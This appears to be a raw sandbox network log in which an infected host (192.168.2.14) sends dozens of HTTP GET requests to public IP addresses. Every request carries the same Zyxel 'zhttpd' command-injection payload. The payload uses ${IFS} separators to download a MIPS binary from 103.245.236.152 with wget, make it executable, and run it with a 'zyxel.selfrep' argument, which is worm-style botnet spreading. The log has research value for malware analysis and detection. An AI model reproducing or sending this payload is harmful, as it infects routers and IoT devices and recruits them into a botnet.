                                      Jan 14, 2024 15:51:03.702589989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8911192.168.2.1436022177.239.95.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702641964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8912192.168.2.1458328199.145.71.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702687979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8913192.168.2.1453380196.161.164.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702725887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8914192.168.2.145766438.125.219.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702754021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8915192.168.2.143447271.151.183.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702822924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8916192.168.2.14346925.107.222.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702851057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8917192.168.2.145752499.103.140.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702908993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8918192.168.2.145394899.1.48.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702943087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8919192.168.2.1451690180.41.222.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.703016043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8920192.168.2.1438594168.217.101.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.703063011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8921192.168.2.145726879.0.224.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.703109980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8922192.168.2.1444306208.188.31.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.703136921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8923192.168.2.144261078.73.195.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.703170061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8924192.168.2.1459722183.124.66.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.703206062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8925192.168.2.1445922220.113.247.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707341909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8926192.168.2.1454498219.22.39.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707386017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8927192.168.2.1448662174.254.123.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707417011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8928192.168.2.1458366190.116.247.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707448959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8929192.168.2.145577086.0.47.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707493067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8930192.168.2.1447732168.117.162.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707537889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8931192.168.2.1449084144.246.22.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707571030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8932192.168.2.1438450169.11.159.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707623959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8933192.168.2.1444134122.161.224.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707648993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8934192.168.2.145937483.140.160.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707681894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8935192.168.2.144065618.26.114.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707763910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8936192.168.2.1440438114.121.83.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707794905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8937192.168.2.144212213.72.234.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707828045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8938192.168.2.14417889.59.221.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707879066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8939192.168.2.143824041.43.140.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707940102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8940192.168.2.145260482.24.99.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.707969904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8941192.168.2.1446832201.238.5.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.708009005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8942192.168.2.1457646140.112.227.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.708075047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8943192.168.2.145203454.202.139.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.708093882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8944192.168.2.1436590179.24.18.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.708146095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8945192.168.2.1442716190.245.239.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.708184958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8946192.168.2.14479529.232.163.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.716939926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8947192.168.2.1444462110.99.114.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717041016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8948192.168.2.145032039.35.55.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717087984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8949192.168.2.1439052189.75.243.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717130899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8950192.168.2.143544858.125.254.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717169046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8951192.168.2.1451796146.169.216.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717221975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8952192.168.2.14539202.21.71.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717268944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8953192.168.2.143897477.172.253.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717305899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8954192.168.2.1451896156.94.200.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717369080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8955192.168.2.1433018181.230.57.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717406034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8956192.168.2.1448514219.246.139.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717439890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8957192.168.2.1454810182.23.24.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717484951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8958192.168.2.1460518218.3.42.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717534065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8959192.168.2.145590836.123.66.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717567921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8960192.168.2.1453986166.239.119.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717601061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8961192.168.2.1434988168.223.180.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717638969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8962192.168.2.145925669.134.39.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717684984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8963192.168.2.1435602152.190.86.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717737913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8964192.168.2.1444510114.165.171.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717768908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8965192.168.2.14371882.56.127.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717812061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8966192.168.2.144972646.86.154.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717854023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8967192.168.2.145108059.111.129.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717905045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8968192.168.2.143347687.118.15.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717952967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8969192.168.2.1446508122.128.141.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.717993975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8970192.168.2.1434424208.160.79.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718029976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8971192.168.2.1445702187.169.31.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718080044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8972192.168.2.1460324118.143.184.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:04.718107939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8973192.168.2.1447552195.204.180.68443
                                      TimestampBytes transferredDirectionData
